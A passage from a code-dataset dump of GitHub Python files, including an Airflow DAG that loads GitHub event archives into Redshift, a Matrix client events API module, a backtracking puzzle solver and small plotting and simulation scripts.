name='index'),\n path(\"courses/upload\", views.course_create, name='course_create'),\n path(\"courses/\", views.courses, name='courses'),\n path(\"course_details/\", views.course_details, name='course_details'),\n path(\"profile/\", views.profile, name='profile'), \n path(\"elements\", views.elements, name='elements'), \n path(\"contact\", views.contact, name='contact'), \n path(\"login\", views.login_view, name='login'), \n path(\"logout\", views.logout_view, name='logout'), \n path(\"register\", views.register, name='register'), \n]\n","repo_name":"AndreiLesi/course_webProgramming","sub_path":"Projekt_5/courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75009330346","text":"from airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators import PostgresOperator\nfrom airflow.contrib.operators.spark_submit_operator import SparkSubmitOperator\nfrom airflow.operators.git_plugin import StageToRedshiftOperator\nfrom airflow.operators.git_plugin import (LoadDimensionOperator, LoadDictOperator, LoadFactOperator)\nfrom airflow.models import Variable\nimport airflow.hooks.S3_hook\nfrom helpers import SqlQueries\nimport configparser\nimport urllib.request\nimport boto3\nimport datetime\nimport logging\nimport sys\nimport os\n\nconfig = configparser.ConfigParser()\nconfig.read('airflow_param.cfg')\nhome_dir = os.getcwd()\n\ndef download_data(*args, **kwargs):\n\n execution_date = kwargs[\"execution_date\"]\n year = execution_date.year\n month = execution_date.month\n day = execution_date.day-1\n date = '{}-{}-{}'.format(year, month, str(day).zfill(2))\n\n cur_dir = os.getcwd()\n wd = '{}/{}'.format(cur_dir, date)\n if not os.path.isdir(wd):\n os.mkdir(wd)\n os.chdir(wd)\n\n opener = urllib.request.URLopener()\n opener.addheader('User-Agent', 'whatever')\n for i in range(0, 24):\n url = 'http://data.gharchive.org/{}-{}.json.gz'.format(date, i)\n filename = '{}-{}.gz'.format(date, i)\n try:\n filename, headers = opener.retrieve(url, filename)\n except Exception as exc:\n logging.info('There was a problem for day %s hour %s: %s ' % (day, i, exc))\n\n Variable.set('year', year)\n Variable.set('month', month)\n Variable.set('day', day)\n\n logging.info('******* Data downloading ended. *******')\n\ndef upload_file_to_S3_with_hook(*args, **kwargs):\n\n execution_date = kwargs[\"execution_date\"]\n year = execution_date.year\n month = execution_date.month\n day = execution_date.day-1\n date = '{}-{}-{}'.format(year, month, str(day).zfill(2))\n\n local_directory = home_dir + '/git_' + date + '.parquet'\n destination = 'git_' + date + '.parquet'\n\n s3_conn = config.get(\"S3\", \"CONNECTION\")\n s3_bucket = config.get(\"S3\", \"BUCKET\")\n hook = airflow.hooks.S3_hook.S3Hook(s3_conn)\n\n for root, dirs, files in os.walk(local_directory):\n for filename in files:\n local_path = os.path.join(root, filename)\n relative_path = os.path.relpath(local_path, local_directory)\n s3_path = os.path.join(destination, relative_path)\n hook.load_file(local_path, s3_path, s3_bucket) \n\ndag = DAG('Git_pipeline',\n schedule_interval = '@daily',\n start_date = datetime.datetime.now() - datetime.timedelta(days=1),\n description = 'Pipeline to download, process and load git data from web to redshift',\n max_active_runs = 1\n )\n\nstart_operator = DummyOperator(\n task_id = 'begin_execution', \n dag = dag\n )\n\ndownload_git_data = PythonOperator(\n task_id = \"download_git_data\",\n python_callable = download_data,\n dag = dag,\n provide_context = True\n )\n\nspark_config = {\n 'conn_id': config.get('HOST', 'SPARK_CONN'),\n 'application': config.get('HOST', 'SPARK_APP')\n }\n\nspark_process= SparkSubmitOperator(\n task_id = \"spark_submit\",\n dag = dag,\n **spark_config\n )\n\ndel_json_task = BashOperator(\n task_id = \"delete_old_data\",\n bash_command = 'rm -r '+ home_dir + '/\"{{ (execution_date - macros.timedelta(days=3)).strftime(\"%Y-%m-%d\") }}\"',\n )\n\ndel_crc_task = BashOperator(\n task_id = \"delete_crc_data\",\n bash_command = 'find '+ home_dir + '/git_{{ (execution_date - macros.timedelta(days=2)).strftime(\"%Y-%m-%d\") }}.parquet/ -name \"*.crc\" -exec rm \\'{}\\' \\;',\n )\n\ndel_suc_task = BashOperator(\n task_id = \"delete_success_data\",\n bash_command = 'rm -r ' + home_dir + '/git_{{ (execution_date - macros.timedelta(days=2)).strftime(\"%Y-%m-%d\") }}.parquet/_SUCCESS',\n )\n\nupload_to_S3_task = PythonOperator(\n task_id = 'upload_parquet_to_S3',\n python_callable = upload_file_to_S3_with_hook,\n dag = dag,\n provide_context = True)\n\ncreate_main_tables = PostgresOperator(\n task_id = \"create_main_tables\",\n dag = dag,\n postgres_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n sql = \"create_main_tables.sql\"\n )\n\ncreate_stage_tables = PostgresOperator(\n task_id = \"create_stage_tables\",\n dag = dag,\n postgres_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n sql = \"create_stage_tables.sql\"\n )\n\nstage_events_dict_to_redshift = StageToRedshiftOperator(\n task_id = 'staging_events_dict_copy',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n aws_credentials_id = config.get(\"AWS\", \"CREDENTIALS\"),\n table = 'events_dict_staging',\n s3_bucket = config.get(\"S3\", \"BUCKET\"),\n s3_key = 'events.csv',\n region = 'us-east-1',\n format = 'csv',\n dag = dag\n )\n\nyear = Variable.get('year')\nmonth = Variable.get('month')\nday = int(Variable.get('day'))\ndate = '{}-{}-{}'.format(year, month, str(day).zfill(2))\nkey = 'git_' + date + '.parquet'\n\nstage_events_to_redshift = StageToRedshiftOperator(\n task_id = 'staging_events_copy',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n aws_credentials_id = config.get(\"AWS\", \"CREDENTIALS\"),\n table = 'events_staging',\n s3_bucket = config.get(\"S3\", \"BUCKET\"),\n s3_key = key,\n region = 'us-east-1',\n format = 'parquet',\n dag = dag\n )\n\nload_actor_dimension_table = LoadDimensionOperator(\n task_id = 'load_actor_dim_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'actors',\n select_sql = SqlQueries.actor_staging_table_insert,\n key1 = 'actor_id',\n key2 = 'actor_login',\n dag = dag\n )\n\nload_repo_dimension_table = LoadDimensionOperator(\n task_id = 'load_repo_dim_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'repos',\n select_sql = SqlQueries.repo_staging_table_insert,\n key1 = 'repo_id',\n key2 = 'repo_name',\n dag = dag\n )\n\nload_dict_dimension_table = LoadDictOperator(\n task_id = 'load_dict_dim_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'events_dict',\n select_sql = SqlQueries.event_dict_staging_table_insert,\n key = 'event',\n dag = dag\n )\n\nload_events_table = LoadFactOperator(\n task_id = 'load_events_fact_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'events',\n insert_sql = SqlQueries.event_table_insert,\n dag = dag\n )\n\ndrop_stage_tables = PostgresOperator(\n task_id = \"drop_stage_tables\",\n dag = dag,\n postgres_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n sql = \"drop_stage_tables.sql\"\n )\n\nend_operator = DummyOperator(\n task_id = 'stop_execution', \n dag = dag\n )\n\nstart_operator >> download_git_data >> spark_process \nspark_process >> del_crc_task >> upload_to_S3_task\nspark_process >> del_suc_task >> upload_to_S3_task\nupload_to_S3_task >> create_main_tables >> create_stage_tables\ncreate_stage_tables >> stage_events_dict_to_redshift >> stage_events_to_redshift\nstage_events_to_redshift >> load_actor_dimension_table >> load_events_table\nstage_events_to_redshift >> load_repo_dimension_table >> load_events_table\nstage_events_to_redshift >> load_dict_dimension_table >> load_events_table\nload_events_table >> drop_stage_tables >> end_operator \nload_events_table >> del_json_task >> end_operator ","repo_name":"liber1320/github_events","sub_path":"airflow/dags/github_dag.py","file_name":"github_dag.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11618043573","text":"N = int(input())\r\n\r\narr = [[\"\"]*N for _ in range(N)]\r\nS = input()\r\nidx = len(S)-1\r\nfor i in range(N):\r\n for j in range(0, i+1):\r\n arr[i][j] = S[idx]\r\n idx -= 1\r\n\r\nstack = []\r\nprefix = []\r\n\r\ndef Check(l):\r\n for i in range(0, l+1):\r\n a = prefix[l]\r\n if i > 0:\r\n a -= prefix[i-1]\r\n if (arr[l][i] == '+' and a <= 0) or (arr[l][i] == '-' and a >= 0) or (arr[l][i] == '0' and a != 0):\r\n return False\r\n return True\r\n\r\n\r\ndef BT(l):\r\n if l == N:\r\n for i in range(N):\r\n print(stack.pop(), end = \" \")\r\n exit()\r\n for num in range(-10, 11):\r\n if len(prefix) > 0:\r\n prefix.append(prefix[-1] + num)\r\n else:\r\n prefix.append(num)\r\n if Check(l) == False:\r\n prefix.pop()\r\n continue\r\n stack.append(num)\r\n BT(l+1)\r\n stack.pop()\r\n prefix.pop()\r\nBT(0)\r\n\r\n\r\n","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/1248. Guess/Guess.py","file_name":"Guess.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74938178988","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n# 防止plt汉字乱码\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nmpl.rcParams['axes.unicode_minus'] = False\n\n\ndef read_csv(file):\n \"\"\"\n 读取CSV文件,允许有多个属性,文件最后一列为目标属性\n 输入参数:\n file:文件名\n 返回:\n x:属性,y:目标属性\n \"\"\"\n with open(file, encoding=\"utf-8\") as fr:\n fr.readline() # 跳过标题行\n content = fr.readlines()\n x = [f.split(\",\")[: -1] for f in content]\n y = [f.split(\",\")[-1].strip(\"\\n\") for f in content]\n return x, y\n\n\ndef main():\n # 加载鸢尾花数据\n file_path = \"../data/fisheriris.csv\"\n x, y = read_csv(file_path)\n x = [float(f[0]) for f in x]\n s1 = x[0: 50]\n s2 = x[50: 100]\n s3 = x[100: 150]\n plt.figure()\n plt.boxplot(np.column_stack((s1, s2, s3)), labels=['setosa', 'versicolor', 'virginica'], notch=True, sym='r+')\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"imcyx/UESTC-CYXBackup","sub_path":"模式识别/参考课件/086437-01/ML-Python/ch1Introduction/percentiles.py","file_name":"percentiles.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5174197145","text":"'''Example of ellipse rotations.'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mr_utils.sim.ssfp import ssfp\nfrom mr_utils.utils import do_planet_rotation\n\nif __name__ == '__main__':\n\n # We know SSFP signal will make an ellipse!\n lpcs = 16\n pcs = np.linspace(0, 2*np.pi, lpcs, endpoint=False)\n TR, alpha = 6e-3, np.deg2rad(70)\n T1, T2, df = .6, 1.2, 100\n\n # Simulate phase cycles\n sigma = .1/2\n I = np.zeros(lpcs, dtype='complex')\n for ii, pc in enumerate(pcs):\n I[ii] = ssfp(T1, T2, TR, alpha, df, pc, M0=1) \\\n + np.random.normal(0, sigma) + 1j*np.random.normal(0, sigma)\n\n # Now find the correct rotation\n xr, yr, cr, phi = do_planet_rotation(I)\n\n plt.plot(I.real, I.imag, '.-')\n plt.plot(xr, yr, '.--')\n plt.show()\n","repo_name":"mckib2/mr_utils","sub_path":"examples/utils/rotate_ellipse.py","file_name":"rotate_ellipse.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"3688149526","text":"from typing import Awaitable, Dict, Optional, List\n\nfrom ...api import Method, JSON, Path\nfrom ...errors import MatrixResponseError\nfrom .types import (UserID, RoomID, EventID, FilterID, SyncToken, PaginationDirection, StateEvent,\n EventType, StateEventContent, MessageEventContent, Member, Event, ContentURI,\n PaginatedMessages, SerializerError, MessageType, RelatesTo, Format, ImageInfo,\n BaseFileInfo, TextMessageEventContent, MediaMessageEventContent, PresenceState,\n EventContent, ReactionEventContent, RelationType)\nfrom .types.event.state import state_event_content_map\nfrom .types.util import Obj, Serializable\nfrom .base import BaseClientAPI\n\n\nclass EventMethods(BaseClientAPI):\n \"\"\"\n Methods in section 8 Events of the spec. Includes ``/sync``ing, getting messages and state,\n setting state, sending messages and redacting messages. See also: `Events API reference`_\n\n .. _Events API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#events\n \"\"\"\n\n # region 8.2 Syncing\n # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#syncing\n\n def sync(self, since: SyncToken = None, timeout: int = 30000, filter_id: FilterID = None,\n full_state: bool = False, set_presence: PresenceState = None) -> Awaitable[JSON]:\n \"\"\"\n Perform a sync request. See also: `/sync API reference`_\n\n Args:\n since (str): Optional. A token which specifies where to continue a sync from.\n timeout (int): Optional. The time in milliseconds to wait.\n filter_id (int): A filter ID.\n full_state (bool): Return the full state for every room the user has joined\n Defaults to false.\n set_presence (str): Should the client be marked as \"online\" or\" offline\"\n\n .. _/sync API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-sync\n \"\"\"\n request = {\"timeout\": timeout}\n if since:\n request[\"since\"] = str(since)\n if filter_id:\n request[\"filter\"] = str(filter_id)\n if full_state:\n request[\"full_state\"] = \"true\" if full_state else \"false\"\n if set_presence:\n request[\"set_presence\"] = str(set_presence)\n return self.api.request(Method.GET, Path.sync, query_params=request)\n\n # endregion\n # region 8.3 Getting events for a room\n # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#getting-events-for-a-room\n\n async def get_event(self, room_id: RoomID, event_id: EventID) -> Event:\n \"\"\"\n Get a single event based on ``room_id``/``event_id``. You must have permission to retrieve\n this event e.g. by being a member in the room for this event.\n See also: `/event/{eventId} API reference`_\n\n Args:\n room_id: The ID of the room the event is in.\n event_id: The event ID to get.\n\n Returns:\n The event.\n\n .. _/event/{eventId} API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-event-eventid\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].event[event_id])\n try:\n return Event.deserialize(content)\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid event in response\") from e\n\n async def get_state_event(self, room_id: RoomID, event_type: EventType,\n state_key: Optional[str] = None) -> StateEventContent:\n \"\"\"\n Looks up the contents of a state event in a room. If the user is joined to the room then the\n state is taken from the current state of the room. If the user has left the room then the\n state is taken from the state of the room when they left.\n See also: `GET /state/{eventType}/{stateKey} API reference`_\n\n Args:\n room_id: The ID of the room to look up the state in.\n event_type: The type of state to look up.\n state_key: The key of the state to look up. Defaults to empty string.\n\n Returns:\n The state event.\n\n .. _GET /state/{eventType}/{stateKey} API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-state-eventtype-statekey\n \"\"\"\n content = await self.api.request(Method.GET,\n Path.rooms[room_id].state[event_type][state_key])\n try:\n return state_event_content_map[event_type].deserialize(content)\n except KeyError:\n return Obj(**content)\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid state event in response\") from e\n\n async def get_state(self, room_id: RoomID) -> List[StateEvent]:\n \"\"\"\n Get the state events for the current state of a room. See also: `/state API reference`_\n\n Args:\n room_id: The ID of the room to look up the state for.\n\n Returns:\n A list of state events with the most recent of each event_type/state_key pair.\n\n .. _/state API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-state\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].state)\n try:\n return [StateEvent.deserialize(event) for event in content]\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid state events in response\") from e\n\n async def get_members(self, room_id: RoomID) -> List[StateEvent]:\n \"\"\"\n Get the list of members for a room. See also: `/members API reference`_\n\n Args:\n room_id: The ID of the room to get the member events for.\n\n Returns:\n A list of most recent member events for each user.\n\n .. _/members API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-members\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].members)\n try:\n return [StateEvent.deserialize(event) for event in content[\"chunk\"]]\n except KeyError:\n raise MatrixResponseError(\"`chunk` not in response.\")\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid state events in response\") from e\n\n async def get_joined_members(self, room_id: RoomID) -> Dict[UserID, Member]:\n \"\"\"\n Get a user ID -> member info map for a room. The current user must be in the room for it to\n work, unless it is an Application Service in which case any of the AS's users must be in the\n room. This API is primarily for Application Services and should be faster to respond than\n `/members`_ as it can be implemented more efficiently on the server.\n See also: `/joined_members API reference`_\n\n Args:\n room_id: The ID of the room to get the members of.\n\n Returns:\n A dictionary from user IDs to Member info objects.\n\n .. _/joined_members API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-joined-members\n .. _/members:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-members\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].joined_members)\n try:\n return {user_id: Member.deserialize(event)\n for user_id, event in content[\"joined\"].items()}\n except KeyError:\n raise MatrixResponseError(\"`joined` not in response.\")\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid member objects in response\") from e\n\n async def get_messages(self, room_id: RoomID, direction: PaginationDirection,\n from_token: SyncToken, to_token: Optional[SyncToken] = None,\n limit: Optional[int] = None, filter_json: Optional[str] = None\n ) -> PaginatedMessages:\n \"\"\"\n Get a list of message and state events for a room. Pagination parameters are used to\n paginate history in the room. See also: `/messages API reference`_\n\n Args:\n room_id: The ID of the room to get events from.\n direction: The direction to return events from.\n from_token: The token to start returning events from. This token can be obtained from a\n ``prev_batch`` token returned for each room by the `sync endpoint`_, or from a\n ``start`` or ``end`` token returned by a previous request to this endpoint.\n to_token: The token to stop returning events at.\n limit: The maximum number of events to return. Defaults to 10.\n filter_json: A JSON RoomEventFilter_ to filter returned events with.\n\n Returns:\n\n .. _RoomEventFilter:\n https://matrix.org/docs/spec/client_server/r0.5.0#filtering\n .. _sync endpoint:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-sync\n .. _/messages API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-messages\n \"\"\"\n query_params = {\n \"from\": from_token,\n \"dir\": direction.value,\n }\n if to_token:\n query_params[\"to\"] = to_token\n if limit:\n query_params[\"limit\"] = str(limit)\n if filter:\n query_params[\"filter\"] = filter_json\n content = await self.api.request(Method.GET, Path.rooms[room_id].messages,\n query_params=query_params)\n try:\n return PaginatedMessages(content[\"start\"], content[\"end\"],\n [Event.deserialize(event) for event in content[\"chunk\"]])\n except KeyError:\n if \"start\" not in content:\n raise MatrixResponseError(\"`start` not in response.\")\n elif \"end\" not in content:\n raise MatrixResponseError(\"`start` not in response.\")\n raise MatrixResponseError(\"`content` not in response.\")\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid events in response\") from e\n\n # endregion\n # region 8.4 Sending events to a room\n # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#sending-events-to-a-room\n\n async def send_state_event(self, room_id: RoomID, event_type: EventType,\n content: StateEventContent, state_key: Optional[str] = \"\", **kwargs\n ) -> EventID:\n \"\"\"\n Send a state event to a room. State events with the same ``room_id``, ``event_type`` and\n ``state_key`` will be overridden.\n See also: `PUT /state/{eventType}/{stateKey} API reference`_\n\n Args:\n room_id: The ID of the room to set the state in.\n event_type: The type of state to send.\n content: The content to send.\n state_key: The key for the state to send. Defaults to empty string.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method. Used by\n :class:`IntentAPI` to pass the timestamp massaging field to\n :meth:`AppServiceAPI.request`.\n\n Returns:\n The ID of the event that was sent.\n\n .. _PUT /state/{eventType}/{stateKey} API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#put-matrix-client-r0-rooms-roomid-state-eventtype-statekey\n \"\"\"\n content = content.serialize() if isinstance(content, Serializable) else content\n resp = await self.api.request(Method.PUT, Path.rooms[room_id].state[event_type][state_key],\n content, **kwargs)\n try:\n return resp[\"event_id\"]\n except KeyError:\n raise MatrixResponseError(\"`event_id` not in response.\")\n\n async def send_message_event(self, room_id: RoomID, event_type: EventType,\n content: EventContent, **kwargs) -> EventID:\n \"\"\"\n Send a message event to a room. Message events allow access to historical events and\n pagination, making them suited for \"once-off\" activity in a room.\n See also: `/send API reference`_\n\n Args:\n room_id: The ID of the room to send the message to.\n event_type: The type of message to send.\n content: The content to send.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method. Used by\n :class:`IntentAPI` to pass the timestamp massaging field to\n :meth:`AppServiceAPI.request`.\n\n Returns:\n The ID of the event that was sent.\n\n .. _/send API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#put-matrix-client-r0-rooms-roomid-send-eventtype-txnid\n \"\"\"\n if not room_id:\n raise ValueError(\"Room ID not given\")\n elif not event_type:\n raise ValueError(\"Event type not given\")\n url = Path.rooms[room_id].send[event_type][self.api.get_txn_id()]\n content = content.serialize() if isinstance(content, Serializable) else content\n resp = await self.api.request(Method.PUT, url, content, **kwargs)\n try:\n return resp[\"event_id\"]\n except KeyError:\n raise MatrixResponseError(\"`event_id` not in response.\")\n\n # region Message send helper functions\n def send_message(self, room_id: RoomID, content: MessageEventContent, **kwargs\n ) -> Awaitable[EventID]:\n \"\"\"\n Send a message to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n content: The content to send.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_message_event(room_id, EventType.ROOM_MESSAGE, content, **kwargs)\n\n def react(self, room_id: RoomID, event_id: EventID, key: str) -> Awaitable[EventID]:\n # TODO make this use the send_relation API instead.\n content = ReactionEventContent(relates_to=RelatesTo(rel_type=RelationType.ANNOTATION,\n event_id=event_id, key=key))\n return self.send_message_event(room_id, EventType.REACTION, content)\n\n def send_text(self, room_id: RoomID, text: str, html: Optional[str] = None,\n msgtype: MessageType = MessageType.TEXT, relates_to: Optional[RelatesTo] = None,\n **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send a text message to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n text: The text to send. If set to None, the given HTML is used instead.\n html: The HTML to send.\n msgtype: The message type to send.\n Defaults to :attr:`MessageType.TEXT` (normal text message)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n if html:\n if not text:\n text = html\n content = TextMessageEventContent(msgtype=msgtype, body=text,\n format=Format.HTML, formatted_body=html)\n else:\n content = TextMessageEventContent(msgtype=msgtype, body=text)\n if relates_to:\n content.relates_to = relates_to\n return self.send_message(room_id, content, **kwargs)\n\n def send_notice(self, room_id: RoomID, text: str, html: Optional[str] = None,\n relates_to: Optional[RelatesTo] = None, **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send a notice text message to a room. Notices are like normal text messages, but usually\n sent by bots to tell other bots not to react to them. If you're a bot, please send notices\n instead of normal text, unless there is a reason to do something else.\n\n Args:\n room_id: The ID of the room to send the message to.\n text: The text to send. If set to None, the given HTML is used instead.\n html: The HTML to send.\n msgtype: The message type to send.\n Defaults to :attr:`MessageType.TEXT` (normal text message)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_text(room_id, text, html, MessageType.NOTICE, relates_to, **kwargs)\n\n def send_emote(self, room_id: RoomID, text: str, html: Optional[str] = None,\n relates_to: Optional[RelatesTo] = None, **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send an emote to a room. Emotes are usually displayed by prepending a star and the user's\n display name to the message, which means they're usually written in the third person.\n\n Args:\n room_id: The ID of the room to send the message to.\n text: The text to send. If set to None, the given HTML is used instead.\n html: The HTML to send.\n msgtype: The message type to send.\n Defaults to :attr:`MessageType.TEXT` (normal text message)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_text(room_id, text, html, MessageType.EMOTE, relates_to, **kwargs)\n\n def send_file(self, room_id: RoomID, url: ContentURI, info: Optional[BaseFileInfo] = None,\n file_name: str = None, file_type: MessageType = MessageType.FILE,\n relates_to: Optional[RelatesTo] = None, **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send a file to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n url: The Matrix content repository URI of the file. You can upload files using\n :meth:`~MediaRepositoryMethods.upload_media`.\n info: Additional metadata about the file, e.g. mimetype, image size, video duration, etc\n file_name: The name for the file to send.\n file_type: The general file type to send. The file type can be further specified by\n setting the ``mimetype`` field of the ``info`` parameter. Defaults to\n :attr:`MessageType.FILE` (unspecified file type, e.g. document)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_message(room_id,\n MediaMessageEventContent(url=url, info=info, body=file_name,\n relates_to=relates_to,\n msgtype=file_type), **kwargs)\n\n def send_sticker(self, room_id: RoomID, url: ContentURI, info: Optional[ImageInfo],\n text: Optional[str] = \"\", relates_to: Optional[RelatesTo] = None, **kwargs\n ) -> Awaitable[EventID]:\n \"\"\"\n Send a sticker to a room. Stickers are basically images, but they're usually rendered\n slightly differently.\n\n Args:\n room_id: The ID of the room to send the message to.\n url: The Matrix content repository URI of the sticker. You can upload files using\n :meth:`~MediaRepositoryMethods.upload_media`.\n info: Additional metadata about the sticker, e.g. mimetype and image size\n text: A textual description of the sticker.\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_message_event(room_id, EventType.STICKER,\n MediaMessageEventContent(url=url, info=info, body=text,\n relates_to=relates_to),\n **kwargs)\n\n def send_image(self, room_id: RoomID, url: ContentURI, info: Optional[ImageInfo] = None,\n file_name: str = None, relates_to: Optional[RelatesTo] = None, **kwargs\n ) -> Awaitable[EventID]:\n \"\"\"\n Send an image to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n url: The Matrix content repository URI of the image. You can upload files using\n :meth:`~MediaRepositoryMethods.upload_media`.\n info: Additional metadata about the image, e.g. mimetype and image size\n file_name: The file name for the image to send.\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_file(room_id, url, info, file_name, MessageType.IMAGE, relates_to,\n **kwargs)\n\n # endregion\n\n # endregion\n # region 8.5 Redactions\n # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#redactions\n\n async def redact(self, room_id: RoomID, event_id: EventID, reason: Optional[str] = \"\", **kwargs\n ) -> EventID:\n \"\"\"\n Send an event to redact a previous event.\n\n Redacting an event strips all information out of an event which isn't critical to the\n integrity of the server-side representation of the room.\n\n This cannot be undone.\n\n Users may redact their own events, and any user with a power level greater than or equal to\n the redact power level of the room may redact events there.\n\n See also: `/redact API reference`_\n\n Args:\n room_id: The ID of the room the event is in.\n event_id: The ID of the event to redact.\n reason: The reason for the event being redacted.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method. Used by\n :class:`IntentAPI` to pass the timestamp massaging field to\n :meth:`AppServiceAPI.request`.\n\n Returns:\n The ID of the event that was sent to redact the other event.\n\n .. _/redact API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#put-matrix-client-r0-rooms-roomid-redact-eventid-txnid\n \"\"\"\n url = Path.rooms[room_id].redact[event_id][self.api.get_txn_id()]\n resp = await self.api.request(Method.PUT, url, content={\"reason\": reason}, **kwargs)\n try:\n return resp[\"event_id\"]\n except KeyError:\n raise MatrixResponseError(\"`event_id` not in response.\")\n\n # endregion\n","repo_name":"Ma27/mautrix-python","sub_path":"mautrix/client/api/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":23791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"31143276917","text":"\"\"\"Metrics to measure progress, and infrastructure for logging them.\"\"\"\n\nimport functools\nimport torch\nfrom . distributed import get_cuda_device\nfrom . tracker import AverageTrackerDevice\nfrom ..data.mask import load_region_mask\n\n\ndef dim_tuple(tensor):\n \"\"\"Return a tuple containing the indices of each dimension of tensor.\n\n For an n-dimensional tensor, this is (0, 1, ..., n - 1).\n\n \"\"\"\n return tuple(range(tensor.ndim))\n\n\n@torch.no_grad()\ndef mse_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the mean square error between x and y.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n \"\"\"\n if mask is None:\n return ((x - y)**2).mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n z = ((x - y)**2) * mask\n return z.sum(dim=(0,) + dim_tuple(x)[2:]) / (mask_nnz * x.size(0))\n\n\n@torch.no_grad()\ndef mae_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the mean absolute error between x and y.\n\n If mask is not None, each mask region is 